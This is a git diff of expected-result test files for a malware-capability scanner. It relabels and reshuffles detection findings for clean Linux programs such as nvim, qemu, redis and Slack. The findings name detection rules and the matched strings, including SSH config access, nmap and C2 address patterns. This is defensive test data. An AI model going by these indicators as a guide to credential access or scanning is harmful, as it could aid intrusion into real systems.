[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) | | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./include](https://github.com/search?q=.%2Finclude&type=code) | | MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/](https://github.com/search?q=%2Ftmp%2F&type=code) | diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple index e5eeedda2..4702fc3f4 100644 --- a/tests/linux/clean/melange.simple +++ b/tests/linux/clean/melange.simple @@ -44,7 +44,7 @@ discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium -evasion/file/location/system_directories: medium +evasion/file/location/system_directory: medium evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium exec/cmd: medium @@ -94,7 +94,6 @@ fs/unmount: low fs/watch: low impact/remote_access/heartbeat: medium impact/remote_access/kill_rm: medium -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple index a2b7f4434..cd28c793c 100644 --- a/tests/linux/clean/mongosh.simple +++ b/tests/linux/clean/mongosh.simple @@ -4,7 +4,6 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/obfuscate: low c2/addr/http_dynamic: medium c2/addr/ip: medium -c2/addr/url: high c2/discovery/ip_dns_resolver: medium c2/server_address: medium collect/archives/unarchive: medium @@ -40,6 +39,8 @@ discover/group/lookup: medium discover/network/interface_get: low discover/network/interface_list: medium discover/network/mac_address: medium +discover/process/name_get: medium +discover/process/parent_pid_get: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: medium @@ -160,9 +161,7 @@ process/create: low process/groupid_set: low process/groups_set: low process/multithreaded: low -process/name_get: medium process/namespace_set: low -process/parent_pid_get: low process/terminate: medium process/terminate/taskkill: medium process/userid_set: low diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple index cdba2a285..71aa9e4b5 100644 --- a/tests/linux/clean/nvim.simple +++ b/tests/linux/clean/nvim.simple @@ -16,7 +16,7 @@ discover/processes/pgrep: medium discover/system/platform: low discover/user/HOME: low discover/user/USER: low -evasion/file/location/tmp_x11_unix: low +evasion/file/location/x11_unix: low evasion/file/prefix: medium exec/conditional/LANG: low exec/dylib/symbol_address: medium @@ -54,7 +54,6 @@ fs/tempdir/TEMP: low fs/tempdir/TMPDIR: low fs/tempdir/create: low fs/tempdir/tempfile_create: low -lateral/scan/tool: medium net/dns/servers: low net/download/fetch: medium net/http/post: medium diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple index 25d47620c..360cb7418 100644 --- a/tests/linux/clean/opa.simple +++ b/tests/linux/clean/opa.simple @@ -53,7 +53,6 @@ fs/proc/self_cgroup: medium fs/proc/self_mountinfo: medium fs/tempdir/tempfile_create: low fs/watch: low -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index cb282ccb5..d707b5e2f 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -20,6 +20,8 @@ | MEDIUM | [data/hash/whirlpool](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/whirlpool.yara#whirlpool) | [hash function often used for cryptomining](https://en.wikipedia.org/wiki/Whirlpool_(hash_function)) | [WHIRLPOOL](https://github.com/search?q=WHIRLPOOL&type=code) | | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | +| MEDIUM | [discover/process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | +| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | @@ -71,8 +73,6 @@ | MEDIUM | [persist/kernel_module/module](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/module.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) | | MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [PidFile](https://github.com/search?q=PidFile&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo](https://github.com/search?q=sudo&type=code) | -| MEDIUM | [process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [sec-tool/net/nmap](https://github.com/chainguard-dev/malcontent/blob/main/rules/sec-tool/net/nmap.yara#nmap) | nmap | [nmap](https://github.com/search?q=nmap&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept](https://github.com/search?q=intercept&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscatedFont](https://github.com/search?q=obfuscatedFont&type=code)
[obfuscates](https://github.com/search?q=obfuscates&type=code) | @@ -89,6 +89,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | @@ -151,7 +152,6 @@ | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | | LOW | [process/namespace_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index f2f50ce2f..9a3b9ab45 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -5,7 +5,6 @@ | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple index 0f4a608e6..f881eac07 100644 --- a/tests/linux/clean/pulumi.simple +++ b/tests/linux/clean/pulumi.simple @@ -38,6 +38,7 @@ discover/cloud/google_metadata: low discover/cloud/google_storage: low discover/group/lookup: medium discover/network/mac_address: medium +discover/process/parent_pid_get: low discover/processes/list: medium discover/system/cpu_info: low discover/system/hostname_get: low @@ -141,7 +142,6 @@ persist/kernel_module/module: medium persist/pid_file: medium privesc/sudo: medium process/chroot: low -process/parent_pid_get: low sus/exclamation: medium sus/intercept: medium sus/leetspeak: medium diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple index 362414c5c..e75f5caf3 100644 --- a/tests/linux/clean/pypi_package_index.json.simple +++ b/tests/linux/clean/pypi_package_index.json.simple @@ -156,7 +156,6 @@ impact/rootkit: low impact/ui/screen_capture: high impact/ui/x11_auth: medium lateral/scan/brute_force: low -lateral/scan/tool: high net/dns/over_https: medium net/download: medium net/http/auth: low diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index dc3add18d..36b975a5a 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -7,7 +7,7 @@ | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | | MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [/.ssh/config](https://github.com/search?q=%2F.ssh%2Fconfig&type=code) | +| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | @@ -29,7 +29,7 @@ | MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | | MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | @@ -58,6 +58,7 @@ | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | @@ -92,7 +93,6 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 9e4875559..300e3d50b 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -16,7 +16,6 @@ | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple index eede552e9..f025f01ea 100644 --- a/tests/linux/clean/rules.json.simple +++ b/tests/linux/clean/rules.json.simple @@ -55,7 +55,6 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium -lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/runtime-security-fentry.o.simple b/tests/linux/clean/runtime-security-fentry.o.simple index 9513547c8..c320ec689 100644 --- a/tests/linux/clean/runtime-security-fentry.o.simple +++ b/tests/linux/clean/runtime-security-fentry.o.simple @@ -17,7 +17,6 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple index fdfff6f56..9abc1e818 100644 --- a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple +++ b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple @@ -18,7 +18,6 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/runtime-security.o.simple b/tests/linux/clean/runtime-security.o.simple index 741309cab..a00a6c4c9 100644 --- a/tests/linux/clean/runtime-security.o.simple +++ b/tests/linux/clean/runtime-security.o.simple @@ -17,7 +17,6 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple index fefb0d049..38d2ee056 100644 --- a/tests/linux/clean/searchindex.json.simple +++ b/tests/linux/clean/searchindex.json.simple @@ -13,7 +13,7 @@ discover/components/docker: medium discover/system/platform: low discover/system/sysinfo: medium evasion/file/location/chdir_unusual: medium -evasion/file/location/system_directories: medium +evasion/file/location/system_directory: medium evasion/rootkit/refs: medium exec/install_additional/package_install: medium exec/install_additional/pip_install: medium @@ -37,7 +37,7 @@ fs/path/usr_local: medium fs/path/var: low fs/path/var_log: medium fs/watch: low -impact/exploit: high +impact/exploit: medium impact/infection/infected: medium impact/remote_access/agent: medium impact/remote_access/backdoor: high diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index 1d262642c..6656a00a5 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -26,6 +26,8 @@ | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) | +| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
